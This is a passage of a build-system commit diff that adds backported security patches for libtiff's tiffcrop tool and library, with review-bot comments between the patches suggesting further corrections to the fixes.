++ uint16 bps = 0, bytes_per_sample;
+
+ obuf = _TIFFmalloc(stripsize);
+ if (obuf == NULL)
+ return (0);
+ _TIFFmemset(obuf, 0, stripsize);
+ (void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
++ (void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
++ if( bps == 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ if( (bps % 8) != 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ bytes_per_sample = bps/8;
+ for (s = 0; s < spp; s++) {
+ uint32 row;
+ for (row = 0; row < imagelength; row += rowsperstrip) {
+@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+
+ cpContigBufToSeparateBuf(
+ obuf, (uint8*) buf + row*rowsize + s,
+- nrows, imagewidth, 0, 0, spp, 1);
++ nrows, imagewidth, 0, 0, spp, bytes_per_sample);
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
+ TIFFError(TIFFFileName(out),
+ "Error, can't write strip %u",
+--
+GitLab
+
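Review bot: The source pointer passed to cpContigBufToSeparateBuf still advances by `+ s`, one byte per sample index, while the last argument is now `bytes_per_sample`. cpContigBufToSeparateBuf is not shown in this patch; if it copies bytes_per_sample bytes per pixel and then skips the other samples, samples wider than 8 bits start mid-sample for s > 0, and the offset should be `(uint8*) buf + row*rowsize + s*bytes_per_sample`. Separately, the second hunk header `@@ -1539,7 +1539,7 @@` does not account for the 15 lines the first hunk adds, so it applies only with an offset. The function body continues past both hunks.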
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
+From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 11:30:18 +0530
+Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
+CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_aux.c | 9 +++++++
+ libtiff/tiffiop.h | 1 +
+ tools/tiffcrop.c | 62 ++++++++++++++++++++++++++---------------------
+ 3 files changed, 44 insertions(+), 28 deletions(-)
+
+diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
+index 8188db5..3dac542 100644
+--- a/libtiff/tif_aux.c
++++ b/libtiff/tif_aux.c
+@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
+ return (float)val;
+ }
+
++uint32 _TIFFClampDoubleToUInt32(double val)
++{
++ if( val < 0 )
++ return 0;
++ if( val > 0xFFFFFFFFU || val != val )
++ return 0xFFFFFFFFU;
++ return (uint32)val;
++}
++
+ int _TIFFSeekOK(TIFF* tif, toff_t off)
+ {
+ /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
+diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
+index 45a7932..c6f6f93 100644
+--- a/libtiff/tiffiop.h
++++ b/libtiff/tiffiop.h
+@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
+ extern float _TIFFUInt64ToFloat(uint64);
+
+ extern float _TIFFClampDoubleToFloat(double);
++extern uint32 _TIFFClampDoubleToUInt32(double);
+
+ extern tmsize_t
+ _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c2c2052..79dd0a0 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
+ {
+- x1 = (uint32) (crop->corners[i].X1 * scale * xres);
+- x2 = (uint32) (crop->corners[i].X2 * scale * xres);
+- y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
+- y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
+ }
+ else
+ {
+- x1 = (uint32) (crop->corners[i].X1);
+- x2 = (uint32) (crop->corners[i].X2);
+- y1 = (uint32) (crop->corners[i].Y1);
+- y2 = (uint32) (crop->corners[i].Y2);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+ if (x1 < 1)
+ crop->regionlist[i].x1 = 0;
+@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ { /* User has specified pixels as reference unit */
+- tmargin = (uint32)(crop->margins[0]);
+- lmargin = (uint32)(crop->margins[1]);
+- bmargin = (uint32)(crop->margins[2]);
+- rmargin = (uint32)(crop->margins[3]);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
+ }
+ else
+ { /* inches or centimeters specified */
+- tmargin = (uint32)(crop->margins[0] * scale * yres);
+- lmargin = (uint32)(crop->margins[1] * scale * xres);
+- bmargin = (uint32)(crop->margins[2] * scale * yres);
+- rmargin = (uint32)(crop->margins[3] * scale * xres);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
+ }
+
+ if ((lmargin + rmargin) > image->width)
+@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)crop->width;
++ width = _TIFFClampDoubleToUInt32(crop->width);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)crop->length;
++ length = _TIFFClampDoubleToUInt32(crop->length);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+ else
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)(crop->width * scale * image->xres);
++ width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)(crop->length * scale * image->yres);
++ length = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
+ { /* inches or centimeters specified */
+- hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
+ }
+ else
+ { /* Otherwise user has specified pixels as reference unit */
+- hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
+ }
+
+ if ((hmargin * 2.0) > (pwidth * page->hres))
+@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->mode & PAGE_MODE_PAPERSIZE )
+ {
+- owidth = (uint32)((pwidth * page->hres) - (hmargin * 2));
+- olength = (uint32)((plength * page->vres) - (vmargin * 2));
++ owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
++ olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
+ }
+ else
+ {
+- owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
+- olength = (uint32)(ilength - (vmargin * 2 * page->vres));
++ owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
++ olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
+ }
+ }
+
+@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ if (olength > ilength)
+ olength = ilength;
+
++ if (owidth == 0 || olength == 0)
++ {
++ TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
++ exit(EXIT_FAILURE);
++ }
++
+ /* Compute the number of pages required for Portrait or Landscape */
+ switch (page->orient)
+ {
+--
+2.25.1
+
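Review bot: Saturating to 0xFFFFFFFF in _TIFFClampDoubleToUInt32 does not protect the check `(lmargin + rmargin) > image->width` in computeInputPixelOffsets, because the sum is still computed in 32 bits (assuming the margins are uint32, as the removed casts suggest) and wraps when one margin is clamped to the maximum. Comparing without the addition avoids that: `if (lmargin > image->width || rmargin > image->width - lmargin)`; the top/bottom check, which is outside the hunk, presumably needs the same form. In computeOutputPixelOffsets the new `owidth == 0 || olength == 0` branch reports "Integer overflow" although a zero also results from a negative value being clamped, so the message could name the invalid margins instead. Both functions extend beyond the visible hunks.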
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
+From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Wed, 9 Feb 2022 21:31:29 +0000
+Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
+ uint32_t underflow.
+
+CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: tiff-4.1.0/tools/tiffcrop.c
+===================================================================
+--- tiff-4.1.0.orig/tools/tiffcrop.c
++++ tiff-4.1.0/tools/tiffcrop.c
+@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+- if (x1 < 1)
+- crop->regionlist[i].x1 = 0;
+- else
+- crop->regionlist[i].x1 = (uint32) (x1 - 1);
++ /* a) Region needs to be within image sizes 0.. width-1; 0..length-1
++ * b) Corners are expected to be submitted as top-left to bottom-right.
++ * Therefore, check that and reorder input.
++ * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
++ */
++ uint32_t aux;
++ if (x1 > x2) {
++ aux = x1;
++ x1 = x2;
++ x2 = aux;
++ }
++ if (y1 > y2) {
++ aux = y1;
++ y1 = y2;
++ y2 = aux;
++ }
++ if (x1 > image->width - 1)
++ crop->regionlist[i].x1 = image->width - 1;
++ else if (x1 > 0)
++ crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
+
+ if (x2 > image->width - 1)
+ crop->regionlist[i].x2 = image->width - 1;
+- else
+- crop->regionlist[i].x2 = (uint32) (x2 - 1);
+- zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
+-
+- if (y1 < 1)
+- crop->regionlist[i].y1 = 0;
+- else
+- crop->regionlist[i].y1 = (uint32) (y1 - 1);
++ else if (x2 > 0)
++ crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
++
++ zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++
++ if (y1 > image->length - 1)
++ crop->regionlist[i].y1 = image->length - 1;
++ else if (y1 > 0)
++ crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
+
+ if (y2 > image->length - 1)
+ crop->regionlist[i].y2 = image->length - 1;
+- else
+- crop->regionlist[i].y2 = (uint32) (y2 - 1);
+-
+- zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ else if (y2 > 0)
++ crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
+
++ zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
+ if (zwidth > max_width)
+ max_width = zwidth;
+ if (zlength > max_length)
+@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
+ }
+ }
+ return (0);
+- }
++ } /* crop_mode == CROP_REGIONS */
+
+ /* Convert crop margins into offsets into image
+ * Margins are expressed as pixel rows and columns, not bytes
+@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
+ bmargin = (uint32) 0;
+ return (-1);
+ }
+- }
++ } /* crop_mode == CROP_MARGINS */
+ else
+ { /* no margins requested */
+ tmargin = (uint32) 0;
+@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
+ off->endx = endx;
+ off->endy = endy;
+
+- crop_width = endx - startx + 1;
+- crop_length = endy - starty + 1;
+-
+- if (crop_width <= 0)
++ if (endx + 1 <= startx)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid left/right margins and /or image crop width requested");
+ return (-1);
+ }
++ crop_width = endx - startx + 1;
+ if (crop_width > image->width)
+ crop_width = image->width;
+
+- if (crop_length <= 0)
++ if (endy + 1 <= starty)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid top/bottom margins and /or image crop length requested");
+ return (-1);
+ }
++ crop_length = endy - starty + 1;
+ if (crop_length > image->length)
+ crop_length = image->length;
+
+@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->selections = crop->zones;
+
+- for (i = 0; i < crop->zones; i++)
++ /* Initialize regions iterator i */
++ i = 0;
++ for (int j = 0; j < crop->zones; j++)
+ {
+- seg = crop->zonelist[i].position;
+- total = crop->zonelist[i].total;
++ seg = crop->zonelist[j].position;
++ total = crop->zonelist[j].total;
++
++ /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
++ if (seg == 0 || total == 0 || seg > total) {
++ continue;
++ }
+
+ switch (crop->edge_ref)
+ {
+@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
+ i + 1, (uint32)zwidth, (uint32)zlength,
+ crop->regionlist[i].x1, crop->regionlist[i].x2,
+ crop->regionlist[i].y1, crop->regionlist[i].y2);
++ /* increment regions iterator */
++ i++;
+ }
+-
++ /* set number of generated regions out of given zones */
++ crop->selections = i;
+ return (0);
+ } /* end getCropOffsets */
+
+--
+GitLab
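Review bot: The rewritten clamping in computeInputPixelOffsets no longer assigns `crop->regionlist[i].x1` when x1 is 0 (likewise x2, y1 and y2), because the removed `if (x1 < 1)` branch that stored 0 was replaced by `else if (x1 > 0)` with no final else. zwidth and zlength are then computed from whatever the fields held before, which is only correct if regionlist is zeroed for every image; that initialisation is not visible here. Adding `else crop->regionlist[i].x1 = 0;` after each of the four chains restores the old behaviour. `image->width - 1` and `image->length - 1` also wrap for a zero-sized image, so a check for that before the comparisons would be worth having.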
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
+From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 18 Aug 2022 09:40:50 +0530
+Subject: [PATCH] CVE-2022-34526
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
+CVE: CVE-2022-34526
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dirinfo.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index 52d53d4..4a1ca00 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
+ default:
+ return 1;
+ }
++ if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
++ return 0;
++ }
+ /* Check if codec specific tags are allowed for the current
+ * compression scheme (codec) */
+ switch (tif->tif_dir.td_compression) {
+--
+2.25.1
+
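Review bot: The early return added to _TIFFCheckFieldIsValidForCodec has no comment, and its placement matters: it sits after the first switch, whose `default: return 1;` has already accepted every tag that is not codec-specific. A comment such as `/* codec-specific tag: reject it when the codec for td_compression is not configured in this build */` would make that ordering explicit. The function starts and ends outside the hunk.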
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
+From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Thu, 13 Oct 2022 14:33:27 +0000
+Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3570 CVE-2022-3598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ #381, #386, #388, #389, #435)
+
+---
+ tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
+ 1 file changed, 117 insertions(+), 92 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c7877aa..c923920 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -126,6 +126,7 @@ static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #ifdef HAVE_STDINT_H
+ # include <stdint.h>
++# include <inttypes.h>
+ #endif
+
+ #ifndef HAVE_GETOPT
+@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+
+ #define TIFF_DIR_MAX 65534
+
++/* Some conversion subroutines require image buffers, which are at least 3 bytes
++ * larger than the necessary size for the image itself. */
++#define NUM_BUFF_OVERSIZE_BYTES 3
++
+ /* Offsets into buffer for margins and fixed width and length segments */
+ struct offset {
+ uint32 tmargin;
+@@ -233,7 +238,7 @@ struct offset {
+ */
+
+ struct buffinfo {
+- uint32 size; /* size of this buffer */
++ size_t size; /* size of this buffer */
+ unsigned char *buffer; /* address of the allocated buffer */
+ };
+
+@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ uint32 dst_rowsize, shift_width;
+ uint32 bytes_per_sample, bytes_per_pixel;
+ uint32 trailing_bits, prev_trailing_bits;
+- uint32 tile_rowsize = TIFFTileRowSize(in);
+- uint32 src_offset, dst_offset;
++ tmsize_t tile_rowsize = TIFFTileRowSize(in);
++ tmsize_t src_offset, dst_offset;
+ uint32 row_offset, col_offset;
+ uint8 *bufp = (uint8*) buf;
+ unsigned char *src = NULL;
+@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
+ exit(-1);
+ }
+- tilebuf = _TIFFmalloc(tile_buffsize + 3);
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 0;
+ tilebuf[tile_buffsize] = 0;
+@@ -986,7 +991,7 @@ static int readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
+ for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
+ {
+ srcbuffs[sample] = NULL;
+- tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
++ tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!tbuff)
+ {
+ TIFFError ("readSeparateTilesIntoBuffer",
+@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ rowstripsize = rowsperstrip * bytes_per_sample * (width + 1);
+
+- obuf = _TIFFmalloc (rowstripsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (obuf == NULL)
+ return 1;
+
+@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ stripsize = TIFFVStripSize(out, nrows);
+ src = buf + (row * rowsize);
+ total_bytes += stripsize;
+- memset (obuf, '\0', rowstripsize);
++ memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
+ {
+ _TIFFfree(obuf);
+@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ if ((dump->outfile != NULL) && (dump->level == 1))
+ {
+- dump_info(dump->outfile, dump->format,"",
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
++ dump_info(dump->outfile, dump->format,"",
+ "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d",
+- s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
+- dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
++ s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
++ dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
+ }
+
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
+@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+- uint32 tile_rowsize = TIFFTileRowSize(out);
++ tmsize_t tile_rowsize = TIFFTileRowSize(out);
+ uint8* bufp = (uint8*) buf;
+ tsize_t tile_buffsize = 0;
+ tsize_t tilesize = TIFFTileSize(out);
+@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ }
+ src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
+
+- tilebuf = _TIFFmalloc(tile_buffsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 1;
++ memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ for (row = 0; row < imagelength; row += tl)
+ {
+ nrow = (row + tl > imagelength) ? imagelength - row : tl;
+@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+ uint32 imagewidth, tsample_t spp,
+ struct dump_opts * dump)
+ {
+- tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+
+ if (obuf == NULL)
+ return 1;
++ memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+
+ TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
+ TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
+@@ -1754,14 +1769,14 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+
+ *opt_offset = '\0';
+ /* convert option to lowercase */
+- end = strlen (opt_ptr);
++ end = (unsigned int)strlen (opt_ptr);
+ for (i = 0; i < end; i++)
+ *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
+ /* Look for dump format specification */
+ if (strncmp(opt_ptr, "for", 3) == 0)
+ {
+ /* convert value to lowercase */
+- end = strlen (opt_offset + 1);
++ end = (unsigned int)strlen (opt_offset + 1);
+ for (i = 1; i <= end; i++)
+ *(opt_offset + i) = tolower((int) *(opt_offset + i));
+ /* check dump format value */
+@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
+ size_t length;
+ char temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
+
++ assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
++
+ little_endian = *((unsigned char *)&little_endian) & '1';
+
+ initImageData(&image);
+@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
+ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ {
+ uint8* bufp = buf;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint32 strip, nstrips = TIFFNumberOfStrips(in);
+- uint32 stripsize = TIFFStripSize(in);
+- uint32 rows = 0;
++ tmsize_t stripsize = TIFFStripSize(in);
++ tmsize_t rows = 0;
+ uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
+ tsize_t scanline_size = TIFFScanlineSize(in);
+
+@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
+ rows = bytes_read / scanline_size;
+ if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
+- TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
+- (int)strip + 1, (unsigned long) bytes_read,
